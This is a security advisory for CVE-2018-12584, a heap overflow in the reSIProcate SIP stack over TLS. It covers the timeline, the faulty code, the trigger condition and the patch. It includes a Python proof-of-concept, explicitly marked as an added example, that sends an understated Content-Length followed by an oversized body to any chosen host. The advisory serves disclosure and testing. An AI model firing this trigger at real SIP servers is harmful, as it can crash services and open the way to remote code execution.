Heap overflow vulnerability in reSIProcate through 1.10.2 | Joachim De Zutter
CVE ID: CVE-2018-12584
References: bugs.debian.org security-tracker.debian.org bugzilla.redhat.com
securityfocus.com seclists.org us-cert.gov canonical.com cvedetails.com packetstormsecurity.com

TIMELINE

    Bug report with test code sent to main reSIProcate developers: 2018-06-15
    Patch created by Scott Godin: 2018-06-18
    CVE ID assigned: 2018-06-19
    Patch committed to reSIProcate repository: 2018-06-21
    Advisory first published on website: 2018-06-22
    Advisory sent to Bugtraq mailing list: 2018-08-08

DESCRIPTION

A heap overflow can be triggered in the reSIProcate SIP stack when TLS is enabled.
Abuse of this vulnerability may cause a denial of service of software using reSIProcate and may
also lead to remote code execution.
No SIP user authentication is required to trigger the vulnerability on the client or server side.

TECHNICAL DETAILS

The file resiprocate/resip/stack/ConnectionBase.cxx contained the following code fragment:

bool
ConnectionBase::preparseNewBytes(int bytesRead)
{
/* ... */
         else if (mBufferPos == mBufferSize)
         {
            // .bwc. We've filled our buffer; go ahead and make more room.
            // The new size is capped by the Content-Length taken from the
            // message headers, so when contentLength < mBufferSize the
            // "larger" buffer is in fact smaller than the one it replaces.
            size_t newSize = resipMin(mBufferSize*3/2, contentLength);
            char* newBuffer = 0;
            try
            {
               newBuffer=new char[newSize];
            }
            catch(std::bad_alloc&)
            {
               ErrLog(<<"Failed to alloc a buffer while receiving body!");
               return false;
            }
            // Copies mBufferSize bytes regardless of newSize: when newSize is
            // smaller, this writes past the end of newBuffer (heap overflow).
            memcpy(newBuffer, mBuffer, mBufferSize);
            mBufferSize=newSize;
            delete [] mBuffer;
            mBuffer = newBuffer;
         }
/* ... */
}

Execution of the code above could be triggered by sending a partial SIP message over TLS with a
Content-Length header field, followed by a second TLS record carrying the associated SIP
message body. By setting the Content-Length field to a value lower than the length of the SIP
message body that followed, a malicious user could trigger a heap buffer overflow: the
replacement buffer is sized from Content-Length, but the copy into it uses the size of the
buffer that has already been filled.

The bug did not appear to be reproducible using TCP instead of TLS even when the TCP packets
were sent with delays between them.

TEST CODE

A Python script can be used to test the vulnerability of both server and client
software based on reSIProcate.
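The following is an added example, not the author's script and not code from the reSIProcate project. It builds the two-chunk exchange described under TECHNICAL DETAILS (a complete header section with an understated Content-Length, then a longer body as a separate TLS write) and can be pointed at a server built on reSIProcate. The SIP identities, the 16 KiB body size, the 100-byte Content-Length, the default host and port, and the disabled certificate verification are all assumptions chosen for a lab instance; the advisory gives none of these values. Testing a client would need the same two chunks sent from a listening TLS server, which this script does not include.

```python
"""Two-chunk TLS probe for the CVE-2018-12584 trigger (added example).

Chunk 1: a syntactically valid SIP request with all headers, including a
Content-Length that understates the body, ending with the empty line.
Chunk 2: a body longer than the advertised Content-Length.

build_request() and check_trigger() run offline; the network code only runs
when the module is executed directly.
"""
import re
import socket
import ssl
import sys
import time

CRLF = "\r\n"

# Assumed sizes: Content-Length must be smaller than the body that follows.
# 16 KiB is chosen only to exceed typical read buffers; it is not a figure
# taken from the advisory.
DEFAULT_CONTENT_LENGTH = 100
DEFAULT_BODY_LENGTH = 16 * 1024


def build_request(content_length=DEFAULT_CONTENT_LENGTH,
                  body_length=DEFAULT_BODY_LENGTH,
                  domain="sip.example.test"):
    """Return (header_chunk, body_chunk) as bytes.

    The header chunk is an INVITE whose Content-Length deliberately
    understates the body chunk. All SIP identities are placeholders
    (assumption); any well-formed request works for the trigger.
    """
    headers = [
        f"INVITE sip:probe@{domain} SIP/2.0",
        "Via: SIP/2.0/TLS 192.0.2.10:5061;branch=z9hG4bK-cve201812584",
        "Max-Forwards: 70",
        f"To: <sip:probe@{domain}>",
        f"From: <sip:tester@{domain}>;tag=cve201812584",
        "Call-ID: cve-2018-12584-probe@192.0.2.10",
        "CSeq: 1 INVITE",
        "Content-Type: application/sdp",
        f"Content-Length: {content_length}",
    ]
    header_chunk = (CRLF.join(headers) + CRLF + CRLF).encode("ascii")
    # Constructed body: an SDP-looking first line padded to exactly body_length.
    body_chunk = (b"v=0\r\n" + b"A" * body_length)[:body_length]
    return header_chunk, body_chunk


def check_trigger(header_chunk, body_chunk):
    """Parse Content-Length back out of the header chunk and report whether
    the pair satisfies the trigger condition (body longer than advertised)."""
    head = header_chunk.decode("ascii")
    if not head.endswith(CRLF + CRLF):
        raise ValueError("header chunk must end with the empty line")
    match = re.search(r"^Content-Length:\s*(\d+)\s*$", head, re.M)
    if match is None:
        raise ValueError("header chunk has no Content-Length")
    advertised = int(match.group(1))
    return {
        "content_length": advertised,
        "body_length": len(body_chunk),
        "triggers": len(body_chunk) > advertised,
    }


def send_trigger(host, port, header_chunk, body_chunk, delay=0.5, timeout=5.0):
    """Send the chunks as two separate TLS writes, pausing so the peer parses
    the headers before any body arrives. Certificate checks are disabled
    because the target is assumed to be a lab instance with a self-signed
    certificate. Returns the peer's reply, or b"" if it closes or times out."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection((host, port), timeout=timeout)
    with context.wrap_socket(raw, server_hostname=host) as tls:
        tls.sendall(header_chunk)
        time.sleep(delay)
        tls.sendall(body_chunk)
        try:
            return tls.recv(4096)
        except (socket.timeout, ConnectionError, ssl.SSLError):
            return b""


if __name__ == "__main__":
    # Assumed defaults: a local SIP-over-TLS listener on the standard port.
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 5061
    head, body = build_request()
    info = check_trigger(head, body)
    if not info["triggers"]:
        sys.exit("sizes do not satisfy the trigger condition")
    print(f"sending Content-Length={info['content_length']} with a "
          f"{info['body_length']}-byte body to {target_host}:{target_port}")
    reply = send_trigger(target_host, target_port, head, body)
    print("reply:", reply[:200] if reply else "none (closed or timed out)")
```

The reply, if any, says little on its own: a vulnerable build may answer before it corrupts the heap, or die silently. Run the target under a memory checker such as AddressSanitizer and compare an unpatched build against one with the fix applied, watching the process rather than the socket.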

EXPLOITABILITY

The exploitability of an affected version of repro on Windows XP Professional with
Service Pack 3 was examined in CVE-2018-12584-exploitability.html. It was separated from this
text because AVG Web Shield considered the text to be a threat.

SOLUTION

A patch was created by Scott Godin and committed to the reSIProcate repository at

https://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608

For Debian 8 "Jessie", CVE-2018-12584 and CVE-2017-11521 have been fixed in resiprocate package
version 1:1.9.7-5+deb8u1 (https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html)

In the Zoiper softphone library the bug has been fixed since 30 March 2018,
and the official patch from the reSIProcate repository was merged on 26 June 2018.

DISCLAIMER

The information in this report is believed to be accurate at the time of publishing based on
currently available information.
Use of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the author nor the publisher
accepts any liability for any direct, indirect, or consequential loss or damage arising from
use of, or reliance on, this information.